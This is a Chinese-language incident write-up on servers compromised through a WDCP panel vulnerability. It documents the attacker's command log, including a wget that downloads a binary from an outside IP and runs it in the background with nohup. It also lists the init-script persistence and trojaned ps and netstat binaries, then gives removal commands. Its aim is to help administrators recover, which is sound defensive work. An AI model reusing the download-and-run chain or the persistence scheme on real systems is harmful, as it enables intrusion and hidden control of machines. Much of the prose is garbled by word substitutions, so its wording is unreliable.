接上篇：一個面板激發的血案（http://www.server110.com/linux_sec/201410/10926.html

接洽到我的幾位客戶都是溝通的環境，溝通的日期（10月27日）由溝通的IP（117.42.52.36，掃了下，可以確定這個IP不是處事器主機，至于是黑 客本身的電腦照舊肉雞就不得而知了）操作wdcp裂痕入侵。
從日志來看，入侵是由東西自動化完成的。

黑 客入侵后留下的呼吁記錄如下：
cd /root
wget http://60.172.229.178/3.rar
chmod 0755 /root/3.rar
chmod 0755 ./3.rar
/dev/null 2>&1 &
nohup ./3.rar > /dev/null 2>&1 &

（3.rar MD5為：522a3b05908c40e37c08e8fb14171dfc）

下面主要寫一下3.rar（留意這是個二進制措施，而非壓縮包）執行后修悔改的文件，給各人修復提供參考。

建設文件：
/etc/rc.d/init.d/DbSecuritySdt
/etc/rc.d/rc1.d/S97DbSecuritySdt
/etc/rc.d/rc2.d/S97DbSecuritySdt
/etc/rc.d/rc3.d/S97DbSecuritySdt
/etc/rc.d/rc4.d/S97DbSecuritySdt
/etc/rc.d/rc5.d/S97DbSecuritySdt
上面的文件內容都一樣，內容為：
#!/bin/bash
/root/3.rar
目標是讓3.rar重啟后自動運行。

建設文件：
/usr/bin/bsd-port/getty
文件內容和3.rar溝通。
同目次下尚有conf.n和getty.lock。

建設文件：
/usr/bin/acpid
文件內容和3.rar溝通。

建設文件：
/etc/rc.d/init.d/selinux
/etc/rc.d/rc1.d/S99selinux
/etc/rc.d/rc2.d/S99selinux
/etc/rc.d/rc3.d/S99selinux
/etc/rc.d/rc4.d/S99selinux
/etc/rc.d/rc5.d/S99selinux
文件內容如下：
#!/bin/bash
/usr/bin/bsd-port/getty
目標照舊讓惡意措施在系統重啟后自動動作。

建設目次：
/usr/bin/dpkgd/
目次下有二個措施：
netstat  ps
這個是系統中正常的措施，轉移到這里做了備份。

替換掉了系統中的/bin/ps和/bin/netstat。
替換后的措施在執行后可以埋沒掉惡意措施的相關執行信息，而且插手了復生惡意措施的成果。

文件操縱到此竣事。

假如確定和本文描寫的入侵環境完全溝通，可以用下面的呼吁修復：
killall 3.rar getty acpid
rm -f /etc/rc.d/rc*.d/S97DbSecuritySdt
rm -f /etc/rc.d/init.d/DbSecuritySdt
rm -rf /usr/bin/bsd-port/
rm -f /usr/bin/acpid
rm -f /etc/init.d/selinux
rm -f /etc/rc.d/rc*.d/S99selinux
rm -f /bin/ps /bin/netstat
cp /usr/bin/dpkgd/ps /bin/
cp /usr/bin/dpkgd/netstat /bin/

這次的WDCP裂痕中，這個3.rar做的惡較量多，但它并不是獨一的做惡者（其他的人可能措施會留下其他的對象，不在上面的描寫范疇內）。
最早的入侵陳跡在10月初已經呈現，3.rar呈現的較量晚，，可是呈現的多，并且外貌上造成的影響較量大（對外掃描必定會導致呆板被封，在海外某些主機商甚至會BAN帳號）。

全文完。